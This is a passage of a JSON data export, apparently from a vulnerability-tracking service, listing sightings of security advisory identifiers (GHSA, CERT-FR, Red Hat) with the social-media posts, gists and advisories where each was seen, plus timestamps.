"2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cxm3-wv7p-598c", "type": "seen", "source": "https://gist.github.com/juristr/9cec3ebe39fb4d199693070b4921c364", "content": "", "creation_timestamp": "2025-08-29T18:07:10.000000Z"}, {"uuid": "da263a21-d269-4f11-9b7b-cc8f120bafa6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4855-q42w-5vr4", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115114167508878506", "content": "", "creation_timestamp": "2025-08-29T21:26:41.092689Z"}, {"uuid": "385462cc-e3b6-4be2-933f-18efec9da051", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4342-x723-ch2f", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115114292491949376", "content": "", "creation_timestamp": "2025-08-29T21:58:28.116923Z"}, {"uuid": "8377c23d-e09c-4153-80d0-567d0b93cf71", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9h52-p55h-vw2f", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115651541601478240", "content": "", "creation_timestamp": "2025-12-02T19:07:58.666347Z"}, {"uuid": "5aff1c54-d04a-40b9-bdc2-2d1948b154dd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pwhc-rpq9-4c8w", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115504284375786423", "content": "", "creation_timestamp": "2025-11-06T18:58:31.786293Z"}, {"uuid": "4affab41-7d57-4e2d-a35f-d70b23e10c6e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9493-h29p-rfm2", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115504291200075241", "content": "", "creation_timestamp": "2025-11-06T19:00:16.316799Z"}, {"uuid": "ecf7f944-9c2b-4ea7-9095-0249890a8d56", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4pfg-2mw5-f8jx", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115231924186868805", "content": "", "creation_timestamp": "2025-09-19T16:33:45.660154Z"}, {"uuid": "95ffa956-9b30-44d9-a01e-f669b3bdae3e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-043", "type": "seen", "source": "https://bsky.app/profile/cert-fr.bsky.social/post/3m336sfepqs2y", "content": "", "creation_timestamp": "2025-10-13T12:13:08.875413Z"}, {"uuid": "b6483634-26b5-473f-9953-e8556abdec67", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g77q-xrww-p834", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115652353149773254", "content": "", "creation_timestamp": "2025-12-02T22:34:21.770440Z"}, {"uuid": "7727db1c-91c6-4aee-8eca-02770b924c58", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5hhx-v7f6-x7gv", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115577592659326077", "content": "", "creation_timestamp": "2025-11-19T17:41:47.363841Z"}, {"uuid": "e8fa99d0-a508-426c-bb73-a5a6c020a32f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pj86-cfqh-vqx6", "type": "seen", "source": "https://bsky.app/profile/azu.bsky.social/post/3m6yrhzgjv42k", "content": "", "creation_timestamp": "2025-12-02T10:50:09.248669Z"}, {"uuid": "b602d23b-3fc4-4fd7-b499-78529f520ac4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wmjr-v86c-m9jj", "type": "seen", "source": "https://bsky.app/profile/azu.bsky.social/post/3m6yrizryeh2b", "content": "", "creation_timestamp": "2025-12-02T10:50:43.102180Z"}, {"uuid": "25eff22f-9195-442a-b0ee-41d5d4c751cb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "ghsa-93hq-5wgc-jc82", "type": "seen", "source": "https://gist.github.com/MacroWang001/698b81dc1e536cc492f9b68476c64f6b", "content": "", "creation_timestamp": "2025-09-05T02:28:05.000000Z"}, {"uuid": "6ad08c6c-bce6-44dd-be60-ce66fcb80eb9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-58p5-r2f6-g2cj", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3ly2oqr75tc2p", "content": "", "creation_timestamp": "2025-09-05T03:10:19.734062Z"}, {"uuid": "f222cf54-2fee-46d2-8142-19745eee2950", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3gcm-f6qx-ff7p", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3lyyazskuuc2o", "content": "", "creation_timestamp": "2025-09-16T21:24:42.889433Z"}, {"uuid": "b7067fa5-14a8-492d-b32e-1cb9e36e7522", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-048", "type": "seen", "source": "https://bsky.app/profile/cert-fr.bsky.social/post/3m5bpe6qei227", "content": "", "creation_timestamp": "2025-11-10T13:15:47.344961Z"}, {"uuid": "b5337a87-227b-486d-b88d-8f8353200f40", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hxj9-33pp-j2cc", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115691377688409077", "content": "", "creation_timestamp": "2025-12-09T19:58:49.625242Z"}, {"uuid": "ed743164-b904-4e58-9106-a94a1e0d46a6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8vch-m3f4-q8jf", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115691377688409077", "content": "", "creation_timestamp": "2025-12-09T19:58:49.701988Z"}, {"uuid": "a347193a-9891-4291-86c4-1d90b9154fb3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xrqc-7xgx-c9vh", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115691600473250373", "content": "", "creation_timestamp": "2025-12-09T20:55:28.511411Z"}, {"uuid": "18e8cec3-d978-43eb-9056-deafd7253b2e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-j76j-5p5g-9wfr", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115691661138997900", "content": "", "creation_timestamp": "2025-12-09T21:10:54.256587Z"}, {"uuid": "44779202-98a7-48ab-a9f2-771b2589c2b1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9jvh-mv6x-w698", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115691795046297042", "content": "", "creation_timestamp": "2025-12-09T21:44:57.503010Z"}, {"uuid": "a2636806-92c1-4901-af54-1de70015e53d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hxp3-63hc-5366", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115691812757707363", "content": "", "creation_timestamp": "2025-12-09T21:49:27.704693Z"}, {"uuid": "e3509720-7ecc-4d6e-a4f3-016d29172f1a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7wfc-4796-gmg5", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115691935815250281", "content": "", "creation_timestamp": "2025-12-09T22:20:45.474706Z"}, {"uuid": "fc39ec03-6259-4fe1-ae27-85e93a958889", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jq53-42q6-pqr5", "type": "seen", "source": "https://bsky.app/profile/slackers.it/post/3m7lqxi46xc2q", "content": "", "creation_timestamp": "2025-12-10T00:01:28.940437Z"}, {"uuid": "f2574e69-7c4b-4562-9c0c-84e01f460484", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mjcp-gpgx-ggcg", "type": "seen", "source": "https://bsky.app/profile/azu.bsky.social/post/3m7lwvgz5u52x", "content": "", "creation_timestamp": "2025-12-10T01:47:43.407768Z"}, {"uuid": "7a91347c-aee4-41d0-a641-0a2295a9579e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "ghsa-4r66-7rcv-x46x", "type": "seen", "source": "https://gist.github.com/N3mes1s/7b69e09e81f324c5a4e945f9bc15b102", "content": "", "creation_timestamp": "2025-12-10T08:03:57.000000Z"}, {"uuid": "eec9244d-4587-44f4-854a-9cec0003f2b6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3jp5-5f8r-q2wg", "type": "seen", "source": "https://bsky.app/profile/azu.bsky.social/post/3m7uof56qpf2x", "content": "", "creation_timestamp": "2025-12-13T13:09:23.863437Z"}, {"uuid": "ffc7da2f-38db-4c67-adde-429b4c67b514", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-496g-mmpw-j9x3", "type": "seen", "source": "https://bsky.app/profile/tesaguri.fedibird.com.ap.brid.gy/post/3m7uonli5oa22", "content": "", "creation_timestamp": "2025-12-13T13:14:15.273405Z"}, {"uuid": "29932fa1-298f-4a50-abb7-1e1e8c9c86ce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-055", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/115723871774526633", "content": "", "creation_timestamp": "2025-12-15T13:42:31.563458Z"}, {"uuid": "0bba761b-7d3e-44a3-a1aa-1fbd4a845445", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-84h7-rjj3-6jx4", "type": "seen", "source": "https://mastodon.social/users/chrisvest/statuses/115724864576648010", "content": "", "creation_timestamp": "2025-12-15T17:55:01.046341Z"}, {"uuid": "586397d6-24b2-4a54-8458-6ae2ef020e2c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-FR5H-RQP8-MJ6G", "type": "seen", "source": "https://t.me/securixy_kz/882", "content": "", "creation_timestamp": "2026-07-12T22:00:11.411053Z"}, {"uuid": "0ef95101-d4c7-41dc-aa2c-7f4c2d9d4107", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-22fw-4jq7-g8r8", "type": "seen", "source": "https://bsky.app/profile/kravietz.agora.echelon.pl.ap.brid.gy/post/3malesa57lf62", "content": "", "creation_timestamp": "2025-12-22T13:49:08.490700Z"}, {"uuid": "47e859ba-0f0c-4a5b-bcbd-49a9141677b9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-056", "type": "seen", "source": "https://bsky.app/profile/cert-fr.bsky.social/post/3malf7z6yfx2c", "content": "", "creation_timestamp": "2025-12-22T13:56:42.578654Z"}, {"uuid": "f3554211-8f22-46f6-b984-a9d41d45394c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-056", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/115763563781757176", "content": "", "creation_timestamp": "2025-12-22T13:56:43.620456Z"}, {"uuid": "b28250b1-e94a-4169-b624-454fd71bb2ac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-v98v-ff95-f3cp", "type": "seen", "source": "https://cyber.gc.ca/en/alerts-advisories/n8n-security-advisory-av25-857", "content": "", "creation_timestamp": "2025-12-22T17:17:07.000000Z"}, {"uuid": "452d22b5-da89-4373-a307-600a1ef16d18", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4389-rwqf-q9gq", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115766117934771647", "content": "", "creation_timestamp": "2025-12-23T00:46:14.945270Z"}, {"uuid": "5dd3f67a-856b-4a80-97b4-6edc039e5ac8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9qr9-h5gf-34mp", "type": "seen", "source": "https://bsky.app/profile/thecascading.bsky.social/post/3mao2tfsgxj2j", "content": "", "creation_timestamp": "2025-12-23T15:28:41.580588Z"}, {"uuid": "62473272-999d-4619-8497-5ce8f63e8ac8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-22fw-4jq7-g8r8", "type": "seen", "source": "https://bsky.app/profile/sodiboo.gaysex.cloud/post/3maoduvbi52r2", "content": "", "creation_timestamp": "2025-12-23T18:10:45.689626Z"}, {"uuid": "f5624da8-bda5-4e13-a53a-d4e5b6e80347", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-v98v-ff95-f3cp", "type": "seen", "source": "https://poliverso.org/objects/0477a01e-f6e0ecab-fcccf0728a573587", "content": "", "creation_timestamp": "2025-12-23T22:47:55.747513Z"}, {"uuid": "6133e49d-4e05-4351-b163-2d73fe425816", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-c67j-w6g6-q2cm", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115771354033133304", "content": "", "creation_timestamp": "2025-12-23T22:57:52.296517Z"}, {"uuid": "c1e6198b-652b-4833-839d-fc9fb04dd173", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-22fw-4jq7-g8r8", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115771362037033715", "content": "", "creation_timestamp": "2025-12-23T22:59:53.408816Z"}, {"uuid": "7470aca9-51e2-453a-a80d-8dade8be7374", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hm5p-x4rq-38w4", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115771407249317251", "content": "", "creation_timestamp": "2025-12-23T23:11:23.306699Z"}, {"uuid": "14a84cc9-7b41-41e0-ad7c-0a5867276664", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wcj4-jw5j-44wh", "type": "seen", "source": "https://bsky.app/profile/azu.bsky.social/post/3mbcyu45xpq2c", "content": "", "creation_timestamp": "2025-12-31T23:19:11.525990Z"}, {"uuid": "a69c9ed4-723c-4806-b232-553537987d2c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rwc2-f344-q6w6", "type": "seen", "source": "https://bsky.app/profile/azu.bsky.social/post/3mbd25gvgx72y", "content": "", "creation_timestamp": "2025-12-31T23:42:18.340593Z"}, {"uuid": "ce529219-39b5-46c7-8903-eb6185291539", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-v4pr-fm98-w9pg", "type": "seen", "source": "https://bsky.app/profile/sublimer.mstdn.sublimer.me.ap.brid.gy/post/3mbvtjl5eqwn2", "content": "", "creation_timestamp": "2026-01-08T11:11:24.384786Z"}, {"uuid": "c76ec246-3fc0-4fe7-82a4-4d6d0de77d8d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0313", "type": "seen", "source": "https://gist.github.com/Darkcrai86/2c138a441b20c16573554de9ff795244", "content": "", "creation_timestamp": "2026-01-08T12:03:36.000000Z"}, {"uuid": "92405ade-2540-4512-a170-27299970b876", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0293", "type": "seen", "source": "https://gist.github.com/Darkcrai86/bb7f9fef45d73899f2e0342c8e6c8464", "content": "", "creation_timestamp": "2026-01-08T12:04:14.000000Z"}, {"uuid": "d9ef74d0-9522-4549-998f-a870945161a7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0351", "type": "seen", "source": "https://gist.github.com/Darkcrai86/e7145376937988a058072e39a69e5cd5", "content": "", "creation_timestamp": "2026-01-08T14:56:29.000000Z"}, {"uuid": "463f7e65-852c-4083-8898-8e501d522091", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-c4ch-xw5p-2mvc", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115860126536933892", "content": "", "creation_timestamp": "2026-01-08T15:13:52.147812Z"}, {"uuid": "93b1c880-d3fa-4908-a265-8908069c9304", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wwpf-3j4p-739w", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115860178095668182", "content": "", "creation_timestamp": "2026-01-08T15:26:58.915059Z"}, {"uuid": "1bb22631-37ff-4b7b-be8d-d090cf768d3e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7hvw-q8q5-gpmj", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115860183942534970", "content": "", "creation_timestamp": "2026-01-08T15:28:28.267522Z"}, {"uuid": "afb257a0-9f07-4f8a-ba93-132085817984", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8947-pfff-2f3c", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115860190037900143", "content": "", "creation_timestamp": "2026-01-08T15:30:01.133712Z"}, {"uuid": "199fdb5f-a2b4-4a34-b7a3-550a8687219f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xfrj-c749-jxxq", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115860235130064905", "content": "", "creation_timestamp": "2026-01-08T15:41:29.302782Z"}, {"uuid": "bc35acb3-2783-453b-9a1a-9ced37bb74b3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-527x-5wrf-22m2", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115860292583544490", "content": "", "creation_timestamp": "2026-01-08T15:56:06.202464Z"}, {"uuid": "d7c2f3fa-8bbf-401d-b46b-511f9157626a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-ww85-x9cp-5v24", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115860296292742268", "content": "", "creation_timestamp": "2026-01-08T15:57:02.657763Z"}, {"uuid": "8f1ca3e8-e8c5-489f-acd8-cd7c687e3bff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0367", "type": "seen", "source": "https://gist.github.com/Darkcrai86/c886d0bef05069c3b8c8c5ccaada8d36", "content": "", "creation_timestamp": "2026-01-08T16:25:33.000000Z"}, {"uuid": "7acc134b-8e68-412a-a8eb-072d3dfa78ca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9726-w42j-3qjr", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115860651322623960", "content": "", "creation_timestamp": "2026-01-08T17:27:19.845390Z"}, {"uuid": "5865e2d9-02b3-4f72-8c56-5045c268a169", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0384", "type": "seen", "source": "https://gist.github.com/Darkcrai86/6d190f25f63737d26efffc2d4389135b", "content": "", "creation_timestamp": "2026-01-08T17:49:29.000000Z"}, {"uuid": "7d2d5772-a3f2-4661-afcb-e38bb6270e54", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0322", "type": "seen", "source": "https://gist.github.com/Darkcrai86/44f9ff6358cf9beffa9e5c49830d40fd", "content": "", "creation_timestamp": "2026-01-08T17:52:24.000000Z"}, {"uuid": "621a5aea-76df-4fd6-8e5c-09d0b295ec19", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0323", "type": "seen", "source": "https://gist.github.com/Darkcrai86/c89e3fe36ad1404754c8fecf240dc4dd", "content": "", "creation_timestamp": "2026-01-08T17:53:32.000000Z"}, {"uuid": "3fd672ca-3957-46b3-a6e2-4f512725f0a1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0321", "type": "seen", "source": "https://gist.github.com/Darkcrai86/2a02df9f0ff83282b16a4b7a375f3e0d", "content": "", "creation_timestamp": "2026-01-08T17:53:08.000000Z"}, {"uuid": "0ef020f7-2c0f-46bd-b33f-a2e81ac88c4b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-fg6f-75jq-6523", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115860839191767119", "content": "", "creation_timestamp": "2026-01-08T18:15:06.413436Z"}, {"uuid": "129e5662-d074-4f26-b1bb-f63379ed7dcc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9583-h5hc-x8cw", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115861500887450169", "content": "", "creation_timestamp": "2026-01-08T21:03:23.073780Z"}, {"uuid": "7ad99002-9665-4359-98fa-59d200c624cc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5fp7-g646-ccf4", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115861610292219134", "content": "", "creation_timestamp": "2026-01-08T21:31:12.590031Z"}, {"uuid": "8c0eeb2a-3fb5-43ea-8645-5da9c9e965bb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-v364-rw7m-3263", "type": "seen", "source": "https://chaos.social/users/christopherkunz/statuses/115865027919809678", "content": "", "creation_timestamp": "2026-01-09T12:00:21.860309Z"}, {"uuid": "745766b5-a7ca-4757-b033-b7a8c81e58d8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0483", "type": "seen", "source": "https://gist.github.com/Darkcrai86/f5deb9e0096255e42024eafa4648e444", "content": "", "creation_timestamp": "2026-01-13T07:41:24.000000Z"}, {"uuid": "2a99c77f-1820-4585-a25d-8d1c5a3a040e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-77g5-qpc3-x24r", "type": "seen", "source": "https://bsky.app/profile/hasamba72.bsky.social/post/3mccfmrtoz32z", "content": "", "creation_timestamp": "2026-01-13T11:00:16.450664Z"}, {"uuid": "2a868ebe-3f10-4273-833b-47f70df5713b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mqw7-c5gg-xq97", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115888290409404878", "content": "", "creation_timestamp": "2026-01-13T14:36:18.864690Z"}, {"uuid": "3446521a-64d3-45b0-bbf8-6bbf3eea6dd6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gjqq-6r35-w3r8", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115901010269908668", "content": "", "creation_timestamp": "2026-01-15T20:31:08.803009Z"}, {"uuid": "baf5e6c3-bce2-451a-8d9d-bcacaae3eea7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mp2g-9vg9-f4cg", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115901016724244972", "content": "", "creation_timestamp": "2026-01-15T20:32:46.944388Z"}, {"uuid": "b31a2da6-8bf4-4a23-a17e-09ad6b67fc23", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vxw4-wv6m-9hhh", "type": "seen", "source": "https://infosec.exchange/users/DarkWebInformer/statuses/115907662034351783", "content": "", "creation_timestamp": "2026-01-17T00:42:46.951688Z"}, {"uuid": "391de75a-1149-4e1f-9b71-c1ea763c19ab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gw32-9rmw-qwww", "type": "seen", "source": "https://bsky.app/profile/azu.bsky.social/post/3mcm43hncml2y", "content": "", "creation_timestamp": "2026-01-17T07:36:08.790412Z"}, {"uuid": "c6de18e6-0ab5-4b17-9dcc-56a8b9fb3259", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": 